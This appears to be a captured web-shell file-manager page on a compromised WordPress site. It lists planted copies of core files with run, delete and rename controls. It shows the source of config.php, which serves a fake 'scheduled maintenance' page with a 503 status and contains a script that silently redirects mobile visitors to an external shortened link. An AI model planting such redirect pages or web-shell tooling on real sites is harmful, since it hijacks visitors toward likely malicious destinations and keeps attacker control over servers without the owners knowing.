at path:
ROOT
/
config.php
run:
R
W
Run
329d7
DIR
2021-01-12 02:05:46
R
W
Run
5ce04
DIR
2026-06-04 20:02:41
R
W
Run
8133d3
DIR
2026-06-04 20:02:41
R
W
Run
f5c4b
DIR
2026-06-04 20:02:40
R
W
Run
images
DIR
2026-06-04 20:02:43
R
W
Run
wp-content
DIR
2026-06-04 20:02:41
R
W
Run
wp-includes
DIR
2026-06-04 20:02:43
R
W
Run
.htaccess
236 By
2026-05-29 02:05:46
R
W
Run
config.php
1.97 KB
1970-01-01 00:00:00
R
W
Run
Delete
Rename
configuration.php
1.97 KB
1970-01-01 00:00:00
R
W
Run
Delete
Rename
css
501 By
2026-05-18 02:15:30
R
W
Run
Delete
Rename
default.php
1.97 KB
1970-01-01 00:00:00
R
W
Run
Delete
Rename
googlebdff998cb6fa80e2.html
337 By
2026-05-20 02:30:39
R
W
Run
Delete
Rename
index.php0
12.41 KB
2024-03-07 09:35:51
R
W
Run
Delete
Rename
main.php
1.97 KB
1970-01-01 00:00:00
R
W
Run
Delete
Rename
robots.txt
406 By
2024-08-24 09:35:53
R
W
Run
search.php
1000 By
2024-11-24 09:35:53
R
W
Run
Delete
Rename
simple.php
15.32 KB
2026-05-16 07:40:30
R
W
Run
Delete
Rename
wp-blog-header.php
1.97 KB
1970-01-01 00:00:00
R
W
Run
Delete
Rename
wp-config.php
1.97 KB
1970-01-01 00:00:00
R
W
Run
Delete
Rename
wp-settings.php
1.97 KB
1970-01-01 00:00:00
R
W
Run
Delete
Rename
error_log
up
📄
config.php
Save
<?php http_response_code(503); header("Retry-After: 3600"); header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0"); header("Pragma: no-cache"); header("Expires: 0"); echo '<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, follow"> <title>Briefly unavailable for scheduled maintenance</title> <style> *{ box-sizing:border-box; } body{ margin:0; height:100vh; display:flex; justify-content:center; align-items:center; background:#f0f6fc; font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Arial,sans-serif; color:#21759b; } .box{ background:#fff; padding:50px 40px; border-radius:18px; box-shadow:0 10px 35px rgba(0,0,0,.08); text-align:center; width:90%; max-width:600px; } .logo{ font-size:62px; font-weight:700; margin:0; letter-spacing:-2px; } .text{ margin-top:20px; font-size:19px; line-height:1.7; color:#5c6b77; } .loader{ width:42px; height:42px; border:3px solid #d9e7f2; border-top:3px solid #21759b; border-radius:50%; margin:30px auto 0; animation:spin 1s linear infinite; } @keyframes spin{ 100%{ transform:rotate(360deg); } } @media(max-width:600px){ .logo{ font-size:44px; } .text{ font-size:16px; } } </style> </head> <body> <div class="box"> <h1 class="logo">WordPress</h1> <div class="text"> Briefly unavailable for scheduled maintenance.<br> Check back in a some hours. </div> <div class="loader"></div> </div> <script> const isMobile = window.matchMedia("(max-width: 768px)").matches || /Android|iPhone|iPad|iPod|Opera Mini|IEMobile/i.test(navigator.userAgent); if (isMobile) { window.location.replace("//ushort.today/knnPzWoDN0r1"); } </script> </body> </html>'; ?>